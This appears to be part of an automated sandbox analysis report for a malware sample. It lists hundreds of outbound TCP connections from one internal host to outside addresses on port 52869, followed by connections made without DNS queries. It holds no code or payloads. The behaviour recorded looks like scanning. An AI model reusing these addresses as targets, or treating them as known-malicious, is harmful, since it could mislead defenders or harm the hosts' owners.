Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.38.73.95:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.143.185.85:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.183.197.65:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.243.134.245:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.246.226.103:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.77.214.40:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.92.249.38:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.149.155.63:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.130.213.6:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.126.160.203:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.191.179.161:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.0.159.169:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.223.159.219:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.48.223.3:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.203.105.162:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.6.40.176:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.79.27.169:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.163.17.65:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.190.92.117:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.187.124.254:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.200.185.127:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.216.24.191:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.14.221.109:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.72.202.139:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.174.32.115:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.71.4.29:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.85.194.218:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.4.0.140:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.14.126.210:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.47.240.253:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.49.235.43:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.150.251.220:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.15.156.149:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.109.169.203:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.103.100.248:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.41.77.43:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.24.57.27:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.80.100.21:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.145.40.103:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.8.245.89:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.192.210.33:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.113.207.248:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.160.119.150:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.128.3.24:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.53.184.222:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.169.100.69:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.164.209.209:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.254.48.56:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.127.1.101:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.214.147.63:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.4.148.109:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.89.88.160:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.82.35.248:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.146.212.176:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.105.204.192:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.15.62.148:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.184.112.103:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.73.166.184:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.40.2.100:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.177.191.154:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.102.71.75:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.43.81.21:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.166.198.51:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.224.212.253:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.29.202.238:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.199.195.124:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.106.180.118:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.26.130.72:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.99.130.208:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.233.11.170:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.79.55.253:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.154.132.90:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.96.131.26:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.141.92.62:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.194.18.135:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.68.29.93:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.175.81.47:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.124.68.3:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.218.43.16:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.187.159.173:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.165.233.42:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.115.10.128:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.119.32.25:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.161.106.213:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.80.166.144:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.188.50.2:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.196.173.123:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.48.43.38:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.154.187.115:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.142.94.197:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.39.230.230:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.14.10.252:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.210.75.230:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.139.132.232:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.163.72.251:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.62.177.81:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.193.122.247:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.227.51.56:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.223.245.177:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.204.64.41:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.148.132.245:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.194.158.94:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.49.134.217:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.161.44.160:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.92.148.251:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.7.208.165:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.32.88.199:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.223.196.34:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.200.83.169:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.22.72.99:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.64.213.22:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.49.111.18:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.108.88.232:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.102.61.135:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.191.140.128:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.153.106.79:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.124.14.241:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.71.169.33:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.134.198.209:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.240.56.81:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.85.144.54:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.182.121.106:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.80.155.240:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.94.142.53:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.201.66.75:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.161.160.183:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.162.5.112:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.240.239.38:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.164.232.31:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.72.27.247:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.40.246.107:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.141.20.51:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.0.105.228:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.93.12.4:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.109.220.218:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.130.186.62:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.103.20.168:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.217.254.132:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.84.173.94:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.172.192.155:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.3.26.53:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.28.56.18:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.77.216.11:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.165.188.207:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.34.119.163:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.141.203.214:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.166.194.47:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.138.226.45:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.93.62.106:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.54.180.29:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.31.165.118:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.218.250.34:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.223.125.157:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.246.214.245:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.145.134.11:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.19.140.208:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.175.203.252:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.59.97.120:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.239.228.157:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.116.5.143:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.13.140.241:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.241.42.56:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.165.94.84:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.198.28.102:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.140.164.222:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.197.114.70:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.150.16.39:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.192.34.246:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.143.184.200:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.158.28.60:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.47.57.192:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.61.127.34:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.63.92.102:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.97.17.153:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.211.83.105:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.64.45.204:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.48.30.117:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.223.172.64:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.155.209.178:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.204.75.186:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.82.236.234:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.40.95.54:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.29.204.146:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.145.156.68:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.31.178.80:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.58.42.223:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.180.234.11:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.12.33.140:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.92.185.146:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.118.154.33:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.40.83.62:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.151.186.143:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.65.89.230:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.173.42.157:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.56.161.227:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.39.143.245:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.117.214.10:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.8.182.183:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.150.189.9:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.242.242.196:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.235.57.63:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.182.116.158:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.144.223.157:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.147.166.162:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.247.248.134:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.94.74.100:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.4.112.156:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.9.190.112:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.66.67.207:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.93.80.73:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.229.242.236:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.181.89.96:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.111.108.8:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.193.240.232:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.30.217.254:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.146.92.172:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.15.137.1:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.174.140.39:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.94.141.76:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.59.208.54:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.9.248.218:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.107.0.31:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.109.21.138:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.19.44.139:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.140.213.231:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.58.40.186:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.222.101.222:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.213.85.156:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.172.52.70:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.173.149.108:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.222.150.61:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.98.68.249:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.127.198.183:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.151.38.195:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.201.220.2:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.121.199.79:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.36.7.65:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.100.30.102:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.220.230.17:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.216.177.171:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.96.220.252:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.196.101.1:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.106.29.11:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.172.13.121:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.116.228.114:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.214.217.241:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.79.10.210:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.251.80.229:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.104.125.118:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.47.16.86:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.150.159.177:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.28.17.125:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.66.24.162:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.93.66.231:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.70.214.96:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.168.204.39:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.20.38.13:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.180.212.183:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.117.209.239:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.217.238.40:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.170.71.239:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.96.139.134:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.140.250.144:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.190.121.0:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.37.173.9:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.179.70.244:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.169.130.51:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.224.41.63:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.162.59.106:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.98.53.238:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.187.6.91:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.24.21.67:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.42.157.13:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.205.255.163:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.121.36.91:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.159.121.21:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.58.236.98:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.90.182.153:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.150.243.27:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.90.197.22:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.143.255.187:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.150.8.33:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.207.227.142:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.248.163.52:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.222.105.34:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.158.186.18:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.220.193.170:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.191.50.74:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.36.1.76:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.83.137.195:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.212.139.208:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.10.132.199:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.129.196.178:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.37.131.196:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.118.133.111:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.137.46.136:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.129.100.152:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.182.232.188:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.34.246.52:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.122.34.193:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.22.123.137:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.175.60.139:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.73.142.155:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.64.57.114:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.18.30.143:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.44.150.250:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.63.214.81:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.76.166.216:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.86.212.70:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.8.151.225:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.124.230.80:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.73.93.93:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.175.244.249:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.21.182.181:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.41.93.167:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.148.25.211:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.95.227.81:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.206.78.107:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.109.33.121:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.224.20.242:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.38.10.72:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.177.248.153:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.137.142.34:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.216.106.73:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.86.144.184:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.126.102.112:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.31.222.233:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.192.230.126:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.222.172.219:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.59.210.239:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 45.41.120.2:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 185.69.125.158:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.136.194.56:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.127.224.0:52869
Source: global traffic TCP traffic: 192.168.2.23:58345 -> 91.86.158.215:52869
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 147.188.30.159
Source: unknown TCP traffic detected without corresponding DNS query: 124.240.211.158
Source: unknown TCP traffic detected without corresponding DNS query: 139.81.199.5
Source: unknown TCP traffic detected without corresponding DNS query: 172.44.129.156
Source: unknown TCP traffic detected without corresponding DNS query: 34.109.179.78
Source: unknown TCP traffic detected without corresponding DNS query: 209.66.247.197
Source: unknown TCP traffic detected without corresponding DNS query: 221.13.21.232
Source: unknown TCP traffic detected without corresponding DNS query: 20.132.98.102
Source: unknown TCP traffic detected without corresponding DNS query: 201.142.5.64
Source: unknown TCP traffic detected without corresponding DNS query: 205.172.121.189
Source: unknown TCP traffic detected without corresponding DNS query: 149.24.169.36
Source: unknown TCP traffic detected without corresponding DNS query: 2.13.133.181
Source: unknown TCP traffic detected without corresponding DNS query: 182.211.75.9
Source: unknown TCP traffic detected without corresponding DNS query: 100.42.36.252
Source: unknown TCP traffic detected without corresponding DNS query: 204.42.49.31
Source: unknown TCP traffic detected without corresponding DNS query: 124.231.9.201
Source: unknown TCP traffic detected without corresponding DNS query: 63.134.12.8
Source: unknown TCP traffic detected without corresponding DNS query: 222.6.60.70
Source: unknown TCP traffic detected without corresponding DNS query: 219.137.252.124
Source: unknown TCP traffic detected without corresponding DNS query: 72.173.181.142
Source: unknown TCP traffic detected without corresponding DNS query: 36.188.193.200
Source: unknown TCP traffic detected without corresponding DNS query: 92.182.202.169
Source: unknown TCP traffic detected without corresponding DNS query: 185.194.107.102
Source: unknown TCP traffic detected without corresponding DNS query: 162.38.118.239
Source: unknown TCP traffic detected without corresponding DNS query: 93.127.100.251
Source: unknown TCP traffic detected without corresponding DNS query: 163.139.174.213
Source: unknown TCP traffic detected without corresponding DNS query: 140.108.86.230
Source: unknown TCP traffic detected without corresponding DNS query: 92.139.121.188
Source: unknown TCP traffic detected without corresponding DNS query: 76.235.214.28
Source: unknown TCP traffic detected without corresponding DNS query: 67.73.37.235
Source: unknown TCP traffic detected without corresponding DNS query: 88.69.252.139
Source: unknown TCP traffic detected without corresponding DNS query: 135.174.171.248
Source: unknown TCP traffic detected without corresponding DNS query: 9.107.57.115
Source: unknown TCP traffic detected without corresponding DNS query: 189.209.154.168
Source: unknown TCP traffic detected without corresponding DNS query: 37.232.215.25
Source: unknown TCP traffic detected without corresponding DNS query: 59.35.78.236
Source: unknown TCP traffic detected without corresponding DNS query: 94.12.187.208
Source: unknown TCP traffic detected without corresponding DNS query: 97.227.104.95
Source: unknown TCP traffic detected without corresponding DNS query: 160.164.122.38
Source: unknown TCP traffic detected without corresponding DNS query: 85.248.242.167
Source: unknown TCP traffic detected without corresponding DNS query: 72.219.136.178
Source: unknown TCP traffic detected without corresponding DNS query: 40.0.8.109
Source: unknown TCP traffic detected without corresponding DNS query: 125.84.40.148
Source: unknown TCP traffic detected without corresponding DNS query: 43.96.203.243
